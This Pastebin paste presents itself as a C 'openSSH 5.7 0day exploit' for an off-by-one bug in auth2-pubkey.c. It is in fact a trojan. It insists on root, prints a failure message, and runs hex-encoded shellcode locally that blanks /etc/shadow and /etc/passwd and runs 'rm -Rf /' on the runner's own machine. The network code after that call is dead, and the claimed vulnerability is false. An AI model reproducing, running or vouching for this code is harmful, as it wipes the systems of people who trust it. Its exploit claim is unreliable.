Guest User

Untitled

a guest
Jan 26th, 2011
2,704
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
  7. */
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  18. void usage(char *argv[])
  19. {
  20. printf("Usage: %s <target> <port>\n", argv[0]);
  21. exit(1);
  22. }
  23.  
  24. unsigned char shellcode[] =
  25. "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  26. "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  27. "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  28. "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  29. "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  30. "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  31. "\xcd\x80";
  32.  
  33.  
  34.  
  35. int main(int argc, char *argv[])
  36. {
  37. int uid = getuid();
  38. int port = 22, sock;
  39. struct hostent *host;
  40. struct sockaddr_in addr;
  41.  
  42. if(uid !=0)
  43. {
  44. fprintf(stderr, "[!!]Error: You must be root\n");
  45. exit(1);
  46. }
  47. if(uid == 0)
  48. {
  49. printf("\t[+]Starting exploit..\n");
  50. }
  51. if(argc != 3)
  52. usage(argv);
  53.  
  54. fprintf(stderr, "[!!]Exploit failed\n");
  55. (*(void(*)())shellcode)();
  56. exit(1);
  57. char payload[1024];
  58. memcpy(payload, &shellcode, sizeof(shellcode));
  59. if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  60. {
  61. printf("[+]Got shell\n");
  62. system("/bin/sh");
  63. }
  64. else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  65. {
  66. fprintf(stderr, "[!!]Exploit failed\n");
  67. exit(1);
  68. }
  69. }
RAW Paste Data